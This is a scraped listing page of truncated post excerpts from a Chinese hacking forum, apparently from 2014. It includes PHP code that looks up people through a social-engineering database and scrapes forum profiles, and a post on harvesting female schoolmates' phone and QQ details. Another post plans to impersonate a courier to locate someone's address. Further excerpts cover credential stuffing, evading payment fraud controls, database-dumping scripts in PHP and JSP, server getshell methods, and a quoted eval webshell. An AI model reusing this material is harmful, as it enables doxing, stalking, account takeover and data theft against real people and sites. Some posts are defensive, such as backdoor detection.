时下，人心浮躁，有工作的人想跳槽，没工作的人愁前途，江湖上的各种“项目”各种职业，猫腻繁多，个个披着华丽的外衣，赤裸裸高额利益引诱，无不是想

<?php class fuckdz{ public function sgk($user){ $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto="); $a=iconv("UTF-8", "GB2312//IGNORE", $a); preg_match_all("/7%\">(.*)</isU",$a,$arr); unset($arr[0]); foreach ($arr as $key=>$r){ return $r; } } public function getuid($host,$uid){ $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid"); if(!strpos($a,"charset=gbk")){ $a=iconv("UTF-8", "GB2312//IGNORE", $a); } preg_match("/<title>(.*)的/isU",$a,$

[现实生活中的社工]批量搞同学校里妹子QQ 手机等信息 浅蓝 | 2014-06-01 10:19 不喜勿喷。 先说一下呢，我这个学校是军事化管理的，有些地方可能和某些学校不一样。

我这样用手机社目标住址大家觉得可行吗？ 小泽 (爱上泷泽萝拉，可我的电脑没有种子 这让我感到绝望) | 2014-06-01 09:31 因为在同城我打算装成xx快递的快递员，然后

rsync一些常用的命令 梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-31 21:27 在对一些大型互联网进行测试的时候经常会遇到rsync。 什么是Rsync

蛋疼的我又YY了一下一种爆路径 寂寞的瘦子 (LISP异教徒) | 2014-05-30 20:20 本次采用耗尽内存的方法，溢出爆路径。。 有些代码为了处理某些数据会这样处理，应

原文链接：http://masatokinugawa.l0.cm/2014/05/flash-highsurrogate-xss.html F

关于linux shell 内网如何做代理 疯子 (世人笑我太疯癫，我笑世人看不穿。) | 2014-05-30 20:24 最近渗透一个网站 拿到一个shell root权限 已提权 现在想渗透内

移动"4G"卡所带来的威胁 从容 (快点交出0day，我保证不砍死你- -.) | 2014-05-29 20:27 又到了发帖的季节了- -. 写的不怎么地，还请大家海涵- -. 现在科技这么发

分享一个爆PHP路径的方法 寂寞的瘦子 (LISP异教徒) | 2014-05-30 00:02 看到很多人都在求爆php网站路径，今天无意中看到了一个php.ini选项，一联想

我来分享一个小技巧，Burp修改response欺骗 小胖子 (VIP你快回来，园长欺负我！) | 2014-05-29 11:38 上次看到某同学在问，很多人都说用fiddle

  新闻来源：http://www.guomii.com/posts/38011 根据《悉尼先驱晨报》的报道：在过去的一天内有大量在澳大利亚的 i

分享一个通过邮件进行IP侦测的网站 CplusHua | 2014-05-28 15:00 地址：http://www.xnetcn.com:8080/search/?c=android 实现

问个问题，一块硬盘最多可以装多个系统？ 松子 | 2014-05-28 09:01 分别问下： 一块硬盘1TB 最多可以安装多少个系统？（包含windows，linux，Mac） 一

年薪60万，这个靠谱么？ Tank (梦想创造奇迹！) | 2014-05-26 11:03 前几天深圳有家公司给我打电话说，有猎头推荐了我的资料，认为我是他们公司一直在寻找的“高手”

下载： ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar ACat.jar、ACat-附数据库驱动.jar 源码：AC

让我们一起来撞乌云的数据库 浮生若梦 | 2014-05-25 18:34 用了3W8的用户数据，撞出了5个乌云账号。除去1W多代理跑不动的之外。。。平均每5000个账号可以撞

这个问题来源于一个网民向乌云的求助，邮件原始内容如下： 您好！ 我之前帮一个朋友在淘宝上面买东西，我是开QQ远程控制他的电脑，用自己的网银付款的

一直有这么一个想法。当得到某0day，我怎样才能最快知道在某大厂商的任意子域名、任意端口下是否存在此漏洞。 于是猥琐的想法就产生了，首先得到乌

COLDFUSION后台getshelll常见的方法就是添加计划任务，COLDFUSION(CVE-2010-2861) 本地包含利用方法dr

如果躲开支付宝风险监控 clzzy (南无阿弥陀佛) | 2014-05-06 16:11 那天申请了一个支付宝账户，用身份证号码和手机号码做了验证（未用银行卡做验证），能充值和交易了。

Elasticsearch 代码执行漏洞利用工具 园长 (乱码你好，乱码再见。) | 2014-05-22 21:12 Elasticsearch_fat.jar，备用地址：http://pan.baid

Mysql漏洞利用（越权，实战怎么从低权限拿到root密码） cnrstar (Be My Personal Best!) | 2014-05-20 21:58 众所周知，Mysql的用户在没有File权限情况下是无法通过Lo

在t00ls看到lcx牛分享了一个asp wget脱裤脚本。 于是拿php写了一个mysql wget版本。 <?php //author: By Gavin //Usage: wget "http://xxx.com/wget_sql.php?sn=0&en=5000000&ln=50000" -O gavin.sql error_reporting(0); ignore_user_abort(); set_time_limit(0); ob_clean(); //配置数据

jsp wget脱裤脚本 Gavin | 2014-05-20 17:27 刚刚和朋友看了下jsp也可以实现 <%@ page contentType="text/html; charset=utf-8" %> <%@ page language="java" %> <%@ page import="java.sql.*" %> <% //author: By Gavin //Usage: wget "http://xxx.com/wget_db.jsp?sn=0&en=5000000&ln=50000" -O gavin.sql out.clear(); //分段每次limit查询出来的条数

如何查找php木马后门高级篇 jusker (爱好后门后门分析) | 2014-05-17 11:54 <?php eval($_POST[xiao])?> # 在正常的编程中eval不常见，可通过字符串匹配查找eval 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) #同样

端口被博彩劫持，求教育原理。 孤月寒城 | 2014-05-18 23:31 如上图，问了买程序的。只需要shell权限，cmd执行。就能搞。求分析技术原理。在线等 [原文地址]

来讨论下，安卓APP常见的风险点有哪些？ cnrstar (Be My Personal Best!) | 2014-05-18 21:52 看很多厂商在球测试APP安全性，很多还是burp抓包，然后测接口的常见web漏洞去了

如何判断域名不一样的两个网站实际上是一个网站 xsser (十根阳具有长短!!) | 2014-05-18 20:16 如题 [原文地址] 各种吐槽： 1# p.z (一回头 青春都喂了狗) | 2014-05-18 20:18 笨 DDO

首先这是php后门这是毫无质疑的 如下同样是 都是这样的 首先了解下linux的grep命令 linux grep命令 1.作用 Linux系统中grep命令是一